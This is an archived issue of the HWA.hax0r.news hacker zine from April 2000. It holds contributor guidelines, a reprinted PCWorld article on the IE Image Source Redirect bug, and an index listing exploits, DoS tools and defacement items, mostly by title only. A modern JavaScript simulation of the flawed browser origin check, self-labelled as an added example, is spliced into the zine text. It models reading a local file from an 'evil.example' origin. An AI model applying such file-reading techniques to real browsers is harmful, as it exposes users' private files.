💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn52.… captured on 2021-12-04 at 18:04:22.

-=-=-=-=-=-=-

      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =  
  ==========================================================================
    [=HWA 2000=]               Number 52 Volume 2 Issue 4 1999    Apr 2000
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  =                      "ABUSUS NON TOLLIT USUM"                          =
  ==========================================================================                                                                             

                    Editor: Cruciphux (cruciphux@dok.org)
            A Hackers Without Attitudes Production. (c) 1999, 2000
                      http://welcome.to/HWA.hax0r.news/
                      
                      
                      *** NEW WEB BOARD NOW ACTIVE ***
                      
              http://discserver.snap.com/Indices/103991.html
                      
  ==========================================================================                                                  
  
                    ____
                   / ___|_____   _____ _ __ __ _  __ _  ___
                  | |   / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
                  | |__| (_) \ V /  __/ | | (_| | (_| |  __/
                   \____\___/ \_/ \___|_|  \__,_|\__, |\___|
                                                 |___/

                                      
                This is #52 covering Mar 13th to April 9th, 2000
                
         ** 564 People are on the email notify list as of this writing.
            
            
            see note below in the Help Out! section re:distribution. 
            
                   
    
  ========================================================================== 
  
  
                     _   _      _        ___        _   _
                    | | | | ___| |_ __  / _ \ _   _| |_| |
                    | |_| |/ _ \ | '_ \| | | | | | | __| |
                    |  _  |  __/ | |_) | |_| | |_| | |_|_|
                    |_| |_|\___|_| .__/ \___/ \__,_|\__(_)
                                 |_|
                                 

  
  
  
  WANT TO HELP? Like, what can I do? Some answers to common questions, taken
  straight from IRC since, well, why re-write it? :) 
  
  
  ** Regarding the people on the email notification list with listbot.
  
     We now have a new listserv system set up with help from the generous
     people of the CCC (Chaos Computer Club) in Germany. If you haven't
     heard of CCC or don't know who they are, you've been living under a
     rock ;)
     
     I am still working on the system; it may or may not be ready for use
     as of this release, but it should certainly be accessible for the next
     one. Soon you will be able to receive the newsletter/zine delivered
     directly to your inbox (yay!). Stay tuned - Ed
     
  
  
  Early one night in #Hwa.hax0r.news ...
  
  <SugarKing> Cruciphux: so do you really need help? cause I can start getting
              articles for ya if you want/need them
  <Cruciphux> yes
  <Cruciphux> damnit
  <Cruciphux> I do need help
  <SugarKing> so what do I do.....look for articles...copy and paste them.....
              then hand them to you?
  <Cruciphux> what do you want to do? 
  <Cruciphux> if you wanna do that sure, email em to me like that
  <Cruciphux> must have a source and or url though
  <SugarKing> ok
  <Cruciphux> ppl always forget urls/sources and I can't print it without a 
              source
  <Cruciphux> if u do and I haven't already put the info in you 'win' a 
              Contributed by: space sn00zer! line under the article
  <Cruciphux> :)
  <SugarKing> hehe
  <Cruciphux> and if yer good at it and get stuff I've never seen (like isn't
              on my excite newsbot list or on HNN etc) then you get
  <Cruciphux> promoted to 'staff'
  <Cruciphux> etc
  <Cruciphux> I should put this in there actually so ppl know what to expect
  <SugarKing> ok cool
  <Cruciphux> and original articles? i'd kill for good original material
  <SugarKing> heh
  <Cruciphux> stress on the 'good' but i'm not too picky if someone wants to make
              a fool of themselves in public.
  <Cruciphux> :-o
  <SugarKing> so what kinda of articles.....anything? from programming to 
              hacking....etc?
  <Cruciphux> pretty much
  <SugarKing> heh
  <Cruciphux> technology, radio, science if it has a techno slant, and of course 
              internet/web security and hacking related
  <Cruciphux> u know the drill
  <SugarKing> yeah
  <Cruciphux> also
  <SugarKing> just checkin...
  <SugarKing> heh
  <Cruciphux> I need someone to do 'research' on web site defacements
  <Cruciphux> an adjunct to what attrition does
  <Cruciphux> like tell me about interesting defacements, I just print the sites
              list i get from attrition
  <SugarKing> like how....person who defaced......??.......??
  <SugarKing> ohh ok
  <Cruciphux> theres a mailing list you can get on that tells you when sites get
              cracked
  <Cruciphux> thats a biggie i'm gonna be asking for in this issue
  <Cruciphux> print the 'good' defacements (shit with an angle) and track down/
              identify defacers and groups
  <Cruciphux> etc
  <SugarKing> ok cool:)
  <Cruciphux> with an eye towards possible profiles (group) and interviews 
              (if they're doing something interesting)
  <Cruciphux> anything else?
  <SugarKing> that looks good:)  
  <SugarKing> it doesn't seem that hard when you hear about people doing it
  <Cruciphux> k lemme know if you wanna do anything and lemme know what you want 
              to do etc
  <SugarKing> but now it sure seems harder than expected
  <Cruciphux> heh
  <SugarKing> but it'll give me something to do at least
  <Cruciphux> well I do everything myself right now in free time and there are 
              areas that i'd like to follow up on and I just don't have the time
  <Cruciphux> so if ppl are willing to help i can keep putting out and hopefully
              things will get better too.
  <SugarKing> well....I'll do anything you want me to do.....but following up on
              defacements and getting articles seems good right now
  <Cruciphux> otherwise i'd have to think about either downsizing or closing down
              and I don't want to do that really.
  <Cruciphux> ok good stuff
  <Cruciphux> local and 'small' stuff like what's going on at your school's computer
              lab ie: security policies are good angles for writing your own stuff
              too if that tickles your fancy
  <Cruciphux> doesn't have to be major world news
  <Cruciphux> *g*
  <SugarKing> ok
  *** Quits: narq (I am free of all prejudices. I hate everyone equally)
  
  -=- 
  
  And, sending in articles etc...
  
  Instead of emailing me this: (txt formatted to 80 cols)
  
  <->
  
  
  Patching IE Security, Yet Again 


  Security vulnerability affects the Win 2000 browser. 

  Windows 2000 is finally here. And so is a patch for a security vulnerability 
  in the Internet browser that is bundled with the new operating system. 
  Microsoft issued the patch on Wednesday, the eve of the release of its 
  much-delayed operating system.

  The bug, which Microsoft calls the Image Source Redirect vulnerability, makes 
  it possible for a malicious Web site operator to read certain types of files 
  on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, 
  and 5.01.

  This means that the iteration of IE that is distributed with Windows 2000, 
  version 5, also is affected by the bug.

  When you want to view a new page with a different domain than the one 
  currently being viewed, a Web server sends the page to your IE browser window. 
  IE then checks the server's permissions on the new page.

  The vulnerability makes it possible for a Web server to open a browser window 
  to a file stored on the IE user's computer, and then switch to a page in the 
  server's domain, gaining access to the contents of the user's files in the 
  process, Microsoft says in a statement.

  Any data that can be seen is accessible only for a short period of time, and 
  the Web site operator would need to know, or guess, the names and locations of 
  files. The operator would also be able to view only file types that can be 
  opened in a browser window, including .txt files, Microsoft says.


  http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html
  
  
  
  <->
  
  ::
  YOU can go ahead and do some editing yourself and send it like this:
  ::
  
  <->
  
  
  Patching IE Security, Yet Again 
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Contributed by SugarKing

  Security vulnerability affects the Win 2000 browser. 

  Source: PCworld
  url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html


  Windows 2000 is finally here. And so is a patch for a security vulnerability 
  in the Internet browser that is bundled with the new operating system. 
  Microsoft issued the patch on Wednesday, the eve of the release of its 
  much-delayed operating system.

  The bug, which Microsoft calls the Image Source Redirect vulnerability, makes 
  it possible for a malicious Web site operator to read certain types of files 
  on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, 
  and 5.01.

  This means that the iteration of IE that is distributed with Windows 2000, 
  version 5, also is affected by the bug.

  When you want to view a new page with a different domain than the one 
  currently being viewed, a Web server sends the page to your IE browser window. 
  IE then checks the server's permissions on the new page.

  The vulnerability makes it possible for a Web server to open a browser window 
  to a file stored on the IE user's computer, and then switch to a page in the 
  server's domain, gaining access to the contents of the user's files in the 
  process, Microsoft says in a statement.

  Any data that can be seen is accessible only for a short period of time, and 
  the Web site operator would need to know, or guess, the names and locations of 
  files. The operator would also be able to view only file types that can be 
  opened in a browser window, including .txt files, Microsoft says.

  @HWA


  <->
  
  ::
  
  Doesn't seem like much, but it saves me a bunch of work and I can plug it
  straight into the zine text...
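  While we're on the Image Source Redirect article reproduced above: the bug
  it describes is an access check made against the wrong thing. A window is
  opened onto a local file, then redirected to a page in the attacker's
  domain; for the brief moment between the redirect starting and the new
  page loading, the window's location already belongs to the attacker while
  its document still holds the file. The following is an added example, not
  code from the zine, from PCWorld or from Microsoft, and it does not
  reproduce IE 4/5 internals or the actual exploit. It is a small model of
  that mechanism: BrowserWindow, originOf, canReadBuggy, canReadFixed,
  runAttack, the file name and the file/page contents are all assumptions
  constructed for illustration. The hard-coded path stands in for the
  "know or guess the names and locations of files" requirement the article
  mentions.

```javascript
// Added example, not code from the zine, PCWorld or Microsoft: a simplified
// model of the access check the Image Source Redirect article describes.
// BrowserWindow, originOf, canReadBuggy, canReadFixed, runAttack and the
// sample file/page contents are assumptions made for illustration; the real
// IE 4/5 internals and the original exploit are not reproduced.

// Origin of a URL: scheme plus host. Local files get their own origin so that
// no web page is ever same-origin with them.
function originOf(url) {
  const u = new URL(url);
  return u.protocol === "file:" ? "file://" : `${u.protocol}//${u.host}`;
}

// A window has two notions of "where it is": the URL it is navigating to
// (updated immediately) and the document actually loaded (replaced only once
// the new page arrives). That gap is the "short period of time" in the article.
class BrowserWindow {
  constructor(url, content) {
    this.location = url;
    this.document = { url, content };
  }
  startNavigation(url) {
    this.location = url;                             // pending target changes at once
  }
  finishNavigation(content) {
    this.document = { url: this.location, content }; // old content is gone
  }
}

// Constructed sample data (not real files or hosts).
const LOCAL_FILES = { "file:///C:/secret.txt": "account=1234 pin=9876" };
const SERVER_PAGES = { "http://evil.example/landing.html": "<html>hi</html>" };

// Flawed check: decides by the window's *pending* location. After the
// redirect starts, that location is in the attacker's domain even though the
// window still holds the local file's contents.
function canReadBuggy(callerOrigin, win) {
  return originOf(win.location) === callerOrigin;
}

// Correct check: decides by the origin of the document that is actually
// committed in the window.
function canReadFixed(callerOrigin, win) {
  return originOf(win.document.url) === callerOrigin;
}

// The sequence the article describes, run against a given access check.
// Returns what the attacker could read mid-navigation and what the window
// holds once the redirect completes.
function runAttack(canRead) {
  const attackerOrigin = "http://evil.example";
  const fileUrl = "file:///C:/secret.txt";
  const landing = "http://evil.example/landing.html";

  // 1. Malicious page opens a window onto a file on the visitor's disk.
  const win = new BrowserWindow(fileUrl, LOCAL_FILES[fileUrl]);
  // 2. It immediately redirects that window to a page in its own domain.
  win.startNavigation(landing);
  // 3. Before the new page loads, it tries to read the window's document.
  const leaked = canRead(attackerOrigin, win) ? win.document.content : null;
  // 4. The redirect completes; the file contents are no longer in the window.
  win.finishNavigation(SERVER_PAGES[landing]);
  const afterLoad = canRead(attackerOrigin, win) ? win.document.content : null;

  return { leaked, afterLoad };
}

console.log("buggy:", runAttack(canReadBuggy));
console.log("fixed:", runAttack(canReadFixed));
```

  With the flawed check the attacker reads the file during the redirect and
  only its own landing page afterwards; with the fixed check it never sees
  the file, because the decision is made on the document that is actually
  loaded rather than on where the window is headed.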

  
  -=-
  
  Etc .. any other questions/comments/ideas/etc email me, you know
  the addy...
  
  -=-                       

 
  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ 
  #                                                                         #
  @      The HWA website is sponsored by CUBESOFT communications. I highly  @ 
  #      recommend you consider these people for your web hosting needs,    #
  @                                                                         @   
  #      Web site sponsored by CUBESOFT networks http://www.csoft.net       #
  @      check them out for great fast web hosting!                         @ 
  #                                                                         # 
  #      http://www.csoft.net/~hwa                                          @
  @                                                                         #  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
 
                    ____                              _
                   / ___| _   _ _ __   ___  _ __  ___(_)___
                   \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
                    ___) | |_| | | | | (_) | |_) \__ \ \__ \
                   |____/ \__, |_| |_|\___/| .__/|___/_|___/
                          |___/            |_|

     
   
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look-see. (Remember, I'm doing
   this for me, not you; the fact that some people happen to get a kick/use
   out of it is of secondary importance.)

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK, or with news sites such as
   AntiOnline or the Hacker News Network (HNN), or mailing lists such as
   BUGTRAQ or ISN; nor could any other 'digest' of this type do so.

    It *is* intended, however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info. It's a labour
   of love and will be continued for as long as I feel like it; I'm not
   motivated by dollars or the illusion of fame. Did you ever notice how
   the most famous/infamous hackers are the ones that get caught? There's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                         Welcome to HWA.hax0r.news ... 

   =-----------------------------------------------------------------------=
   
    
    "If life is a waste of time and time is a waste of life, then let's all get
     wasted and have the time of our lives"
                                                - kf

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

    Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on the zine and around the   ***
    *** scene or just to hang out, we get some interesting visitors you    ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************
    
    
    

        
  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]                     HWA.hax0r.news                            #52
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. LEGAL & COPYRIGHTS ..............................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. THIS IS WHO WE ARE ..............................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those who use it properly." This is our new motto.         

  =--------------------------------------------------------------------------=
    Key     Content    
  =--------------------------------------------------------------------------=
  
  
    "The three most dangerous things in the world are a programmer with a
     soldering iron, a hardware type with a program patch and a user with
     an idea." - Unknown

  

    01.0  .. GREETS ...........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ............................
     01.2 .. Mailbag ..........................................................
    02.0  .. From the Editor................................................... 
    03.0  .. Clearing up a nasty screw up in issue #51, here's what happened...
    04.0  .. HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!...................    
    05.0  .. WebTV hit by "Melissa-Type" virus.................................
    06.0  .. BlaznWeed interview, background info, exploit code and Sect0r.....    
    07.0  .. plusmail cgi exploit..............................................
    08.0  .. 2600 activism against the MPAA....................................
    09.0  .. Microsoft sends magazine full versions of Windows 2000............
    10.0  .. HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ...........
    11.0  .. HNN:Mar 13th:Online Guerrilla War Rages In Brazil ................
    12.0  .. HNN:Mar 13th:French Bank Card Algorithm Released .................
    13.0  .. HNN:Mar 13th:Still No Suspects in DDoS Attacks ...................
    14.0  .. HNN:Mar 13th:Japanese Pirates Busted .............................
    15.0  .. HNN:Mar 13th:Online Handles Impose Fear ..........................
    16.0  .. HNN:Mar 13th:Vendors Still Making Insecure Software ..............
    17.0  .. HNN:Mar 14th:Smart Card Inventor Issues Challenge ................
    18.0  .. HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ........
    19.0  .. HNN:Mar 14th:Tracking Down Coolio.................................
    20.0  .. HNN:Mar 14th:DOJ Launches Cybercrime Site ........................
    21.0  .. HNN:Mar 14th:China Relaxes Crypto Rules ..........................
    22.0  .. HNN:Mar 14th:Stallman on UCITA ...................................
    23.0  .. HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?................
    24.0  .. HNN:Mar 15th:UCITA Signed By Governor in Virginia ................
    25.0  .. HNN:Mar 15th:RIP Goes Before Commons Today .......................
    26.0  .. HNN:Mar 15th:Security Patch Locks Out Users ......................
    27.0  .. HNN:Mar 15th:DNA Used for Steganography ..........................    
    28.0  .. HNN:Mar 15th:Bugging SAT Phones ..................................
    29.0  .. HNN:Mar 15th:More and more EZines ................................ 
    30.0  .. HNN:Mar 16th:Army on Alert Over CyberAttack Fear  ................
    31.0  .. HNN:Mar 16th:NASA Fears CyberAttack From Brazil ..................
    32.0  .. HNN:Mar 16th:FBI Site Hit by DOS Again ...........................
    33.0  .. HNN:Mar 16th:Teenager Arrested in Online Bank Scam ...............
    34.0  .. HNN:Mar 16th:Former Employee Arrested For Attack On Company ......
    35.0  .. HNN:Mar 16th:PlayStation2 can Play US DVD ........................
    36.0  .. HNN:Mar 16th:ISTF Releases Security Recommendations ..............
    37.0  .. HNN:Mar 17th:485,000 Credit Cards #s Stolen, Found on Gov Comp.... 
    38.0  .. HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks .......
    39.0  .. HNN:Mar 17th:Secret Service Harassing Bernie S Again .............
    40.0  .. HNN:Mar 17th:Secret Service to Work with Citicorp to Fight Fraud..
    41.0  .. HNN:Mar 17th:Computer History Lecture Series .....................
    42.0  .. HNN:Mar 17th:Australian Police To Increase Online Presence .......
    43.0  .. HNN:Mar 17th:Apex DVD Defeats Region and Macrovision .............
    44.0  .. HNN:Mar 20th:First Malicious Code Directed at WebTV ..............
    45.0  .. HNN:Mar 20th:Liberia Claims Attack In CyberWar ...................
    46.0  .. HNN:Mar 20th:Judge Bans Anti-Filter Software .....................
    47.0  .. HNN:Mar 20th:We Spy To Prevent Bribes ............................
    48.0  .. HNN:Mar 20th:LAPD Tells Parody Site To Chill .....................
    49.0  .. HNN:Mar 20th:New Windows Worm Virus ..............................
    50.0  .. HNN:Mar 20th:GNIT Now Freeware ...................................
    51.0  .. HNN:Mar 20th:Online Criminals Labeled Boffins ....................
    52.0  .. HNN:Mar 21st:Conflict In Kashmir Continues Online ................
    53.0  .. HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack .........
    54.0  .. HNN:Mar 21st:2600 AU to Broadcast DeCSS ..........................
    55.0  .. HNN:Mar 21st:CIA Monitoring Upheld by Court ......................
    56.0  .. HNN:Mar 21st:Make Your Reservations for RootFest Now! ............
    57.0  .. HNN:Mar 22nd:Cybercrime On The Rise ..............................
    58.0  .. HNN:Mar 22nd:The Next Version of Windows Leaked ..................
    59.0  .. HNN:Mar 22nd:Toronto Business Held For Extortion .................
    60.0  .. HNN:Mar 22nd:Is the Census Secure? ...............................
    61.0  .. HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web ..........
    62.0  .. HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ............
    63.0  .. HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ......
    64.0  .. HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ...........
    65.0  .. HNN:Mar 23rd:Business May Be Protected Against FOIA ..............
    66.0  .. HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ............
    67.0  .. HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set ....
    68.0  .. HNN:Mar 24th:Max Vision Indicted in San Jose .....................
    68.1  .. KYZSPAM: More on Max Vision bust..................................
    69.0  .. HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ...........
    70.0  .. HNN:Mar 24th:Rack Mount Your iMac ................................
    71.0  .. HNS:Mar 24th:SECRETS STOLEN.......................................
    72.0  .. HNS:Mar 24th:PATCH RELEASED BY TREND MICRO........................
    73.0  .. HNS:Mar 24th:PRIVACY ISSUES.......................................
    74.0  .. HNS:Mar 24th:TARGETING ONLINE SCAMMERS............................
    75.0  .. HNS:Mar 24th:FEARS OF FREENET.....................................
    75.1  ...(More) Anonymous net access aiding and abetting online criminals?.
    76.0  .. HNS:Mar 24th:FEDERAL CIO NEEDED...................................
    77.0  .. HNS:Mar 24th:DETERRENT SENTENCES..................................
    78.0  .. HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC...........................
    79.0  .. HNS:Mar 23rd:ALTERING WEB SITES...................................
    80.0  .. HNS:Mar 23rd:SECURITY BREACHES....................................
    81.0  .. HNS:Mar 23rd:ATTACK COSTS RISE....................................
    82.0  .. HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS....................
    83.0  .. HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY....................
    84.0  .. HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT...........................
    85.0  .. HNS:Mar 23rd:"ANTI-ARAB" BUG......................................
    86.0  .. HNS:Mar 23rd:OFFICE 2000 PATCHES..................................
    87.0  .. HNS:Mar 23rd:SHARING INFORMATION..................................
    88.0  .. HNS:Mar 23rd:MONITORING WITH GOOD RESULTS.........................
    89.0  .. HNS:Mar 23rd:CRIME FIGHTING LAB...................................
    90.0  .. HNS:Mar 23rd:HUNTING CROATIAN PIRATES.............................
    91.0  .. HNS:Patch available for OfficeScan vulnerability..................
    92.0  .. HNS:Gpm-root problems.............................................
    93.0  .. HNS:Esafe Protect Gateway (CVP) problems..........................
    94.0  .. HNS:Bug in Apache project: Jakarta Tomcat.........................
    95.0  .. HNS:MS SECURITY BULLETIN #18......................................
    96.0  .. HNS:S.A.F.E.R. Security Bulletin 000317...........................
    97.0  .. HNS:Decon fix for con/con is vulnerable...........................
    98.0  .. HNS:Cerberus Information Security Advisory........................
    99.0  .. HNS:Malicious-HTML vulnerabilities at deja.com....................
   100.0  .. HNS:Certificate Validation Error in Netscape Browsers.............
   101.0  .. HNS:"OfficeScan DoS & Message Replay" Vulnerability...............
   102.0  .. HNS:MS Security bulletin#17.......................................
   103.0  .. HNS:Georgi Guninski security advisory #9..........................
   103.1  .. PSS:More MSIE crashing info by NtWakO.............................
   104.0  .. HNS:Drive Mappings in Interactive Login...........................
   105.0  .. HNS:DoS Attack in MERCUR WebView .................................
   106.0  .. HNS:Problem with Firewall-1.......................................
   107.0  .. HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b.................
   108.0  .. HNS:Extending the FTP "ALG" vulnerability ........................
   109.0  .. FreeBSD-SA-00:08: Lynx overflows..................................
   110.0  .. Curador? BUSTED...................................................
   111.0  .. PSS: Shaft Distributed DoS tool analysis Sven Dietrich............
   111.1  .. PSS: Shaft Node/Master analysis by Rick Wash & Jose Nazario.......
   112.0  .. Wrapster, the Napster hack fires up the trading fires.............        
   113.0  .. AceFTP vulnerability by Armour....................................
   114.0  .. Pursuit Zine #1 (Aug 99)..........................................
   115.0  .. SecurityFocus.com Newsletter 33...................................
   116.0  .. You can get into trouble for hacking!.............................
   117.0  .. SSHD v2.0.11< (old) Watch your version numbers!...................
   118.0  .. BBC:"Outdoing the hackers"........................................
   119.0  .. HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more).
   120.0  .. HNN:Mar 27th:Inferno Busted in Brazil ............................
   121.0  .. HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth ..........        
   122.0  .. HNN:Mar 27th:PalmPilot WarDialer Released ........................        
   123.0  .. HNN:Mar 27th:Mi5 Computer Stolen .................................
   124.0  .. HNN:Mar 27th:"HNN Wins Bad Ass Media Award".......................        
   125.0  .. HNN:Mar 28th:French Ban Anonymous Internet........................
   126.0  .. HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ........
   127.0  .. HNN:Mar 28th:2600 Under Fire From NBC ............................
   128.0  .. HNN:Mar 28th:Takedown Debuts in France ...........................       
   129.0  .. HNN:Mar 28th:Mattel Buys Rights to CPHack ........................
   130.0  .. HNN:Mar 28th:Cyber Security Bill Passes Committee ................
   131.0  .. HNN:Mar 28th:Census Gets NSA to Look at Security .................
   132.0  .. HNN:Mar 28th:Icomlib 1.0.0 Final Released ........................
   133.0  .. HNN:Mar 28th:China Bans MP3s .....................................
   134.0  .. HNN:Mar 29th:MostHated to Plead Guilty ...........................
   135.0  .. HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ........
   136.0  .. HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits .......
   137.0  .. HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag........       
   138.0  .. HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes.... 
   139.0  .. HNN:Mar 29th:Another DVD Work Around on PlayStation 2.............
   140.0  .. HNN:Mar 29th:Interview with Attrition Staff Posted................
   141.0  .. HNN:Mar 29th:The Unfairness of Computer Crime Sentences...........
   142.0  .. HNN:Mar 29th:@tlanta Con to be Held this Weekend..................
   143.0  .. HNN:Mar 30th:MostHateD Busted for Burglary and Theft..............
   144.0  .. HNN:Mar 30th:Miramax Sued for Fugitive Game.......................
   145.0  .. HNN:Mar 30th:Glassbook Shattered..................................
   146.0  .. HNN:Mar 30th:Yahoo Sued Over Piracy...............................
   147.0  .. HNN:Mar 30th:Italian University Attacked by Brazilian Intruders...
   148.0  .. HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions..........
   149.0  .. HNN:Mar 30th:Australia To Protect Privacy of Works................
   150.0  .. HNN:Mar 31st:Y2Hack Goes on in Israel.............................
   151.0  .. HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil....
   152.0  .. HNN:Mar 31st:China Sets Up security Test Center...................
   153.0  .. HNN:Mar 31st:Hackers Probe Physical Security of MIT...............
   154.0  .. HNN:Mar 31st:DVD for Linux is Now Legal...........................
   155.0  .. HNN:Mar 31st:Y2K Survivalists Come Out of Hiding..................
   156.0  .. CoreZine: New zine by lamagra of b0f..............................
   157.0  .. Paper:Some Extra Security In The Linux Kernel - Auditfile by {}...
   158.0  .. Lets hack an NT box...how they are being defaced & how to secure..
   159.0  .. Hijack any .nu domain box (DoS/redirection/hijack)................
   160.0  .. The dreaded and most pheared return of the infamous GOAT!.........
   161.0  .. b0f: exploit code to hang any linux machine by eth0...............
   162.0  .. HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script.. 
   163.0  .. HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" ..............
   164.0  .. HNN:Apr 3rd:Forget Cookies, Worry About Cache ....................
   165.0  .. HNN:Apr 3rd:Identity Theft On the Rise ...........................
   166.0  .. HNN:Apr 3rd:Computer Crime Laws ..................................
   167.0  .. HNN:Apr 4th:Computers Turned Into Bombs Via The Net...............
   168.0  .. HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book........
   169.0  .. HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP..........
   170.0  .. HNN:Apr 4th:Federal Web Site Security Called Weak (Again).........
   171.0  .. HNN:Apr 4th:Germans Propose Strike Force For Net Defense..........
   172.0  .. HNN:Apr 4th:New Mags are Now Available............................
   173.0  .. HNN:Apr 5th:De Beers Releases Personal Info.......................
   174.0  .. HNN:Apr 5th:CFP In Toronto........................................
   175.0  .. HNN:Apr 5th:Enigma Machine Stolen From Museum.....................
   176.0  .. HNN:Apr 5th:Thailand Police Form Cyber Crime Panel................
   177.0  .. HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked..............
   178.0  .. HNN:Apr 6th:DoubleClick Wins Privacy Award........................
   179.0  .. HNN:Apr 6th:ACLU Appeals CPHack Ruling............................
   180.0  .. HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking...........
   181.0  .. HNN:Apr 6th:Enigma Suspect Busted.................................
   182.0  .. HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate........
   183.0  .. HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses.......
   184.0  .. HNN:Apr 6th:History of the L0pht, Part 1..........................
   185.0  .. HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech...
   186.0  .. HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors.......
   187.0  .. HNN:Apr 7th:Links to Web Sites Illegal............................
   188.0  .. HNN:Apr 7th:British Companies Complacent..........................
   189.0  .. HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong
   190.0  .. HNN:Apr 7th:Census Afraid of Electronic Intrusion.................
   191.0  .. HNN:Apr 7th:Hardware Key Logger Introduced........................
   192.0  .. HNN:Apr 7th:Napalm Issue 4........................................
   193.0  .. HNS:Apr 8th:NEW KIND OF SECURITY SCANNER..........................
   194.0  .. HNS:Apr 8th:WAYS TO ATTACK........................................
   195.0  .. HNS:Apr 7th:STOLEN ACCOUNTS.......................................
   196.0  .. HNS:Apr 7th:JAILED FOR SIX MONTHS.................................
   197.0  .. HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION...................
   198.0  .. HNS:Apr 7th:NET PRIVACY TOOLS.....................................
   199.0  .. HNS:Apr 7th:SECURITY ADDITIONS....................................
   200.0  .. HNS:Apr 7th:COOKIES...............................................
   201.0  .. HNS:Apr 7th:SECURE E-MAIL SERVICE.................................
   202.0  .. HNS:Apr 7th:ONLINE MUGGERS........................................
   203.0  .. HNS:Apr 6th:SURVEY BY DTI.........................................
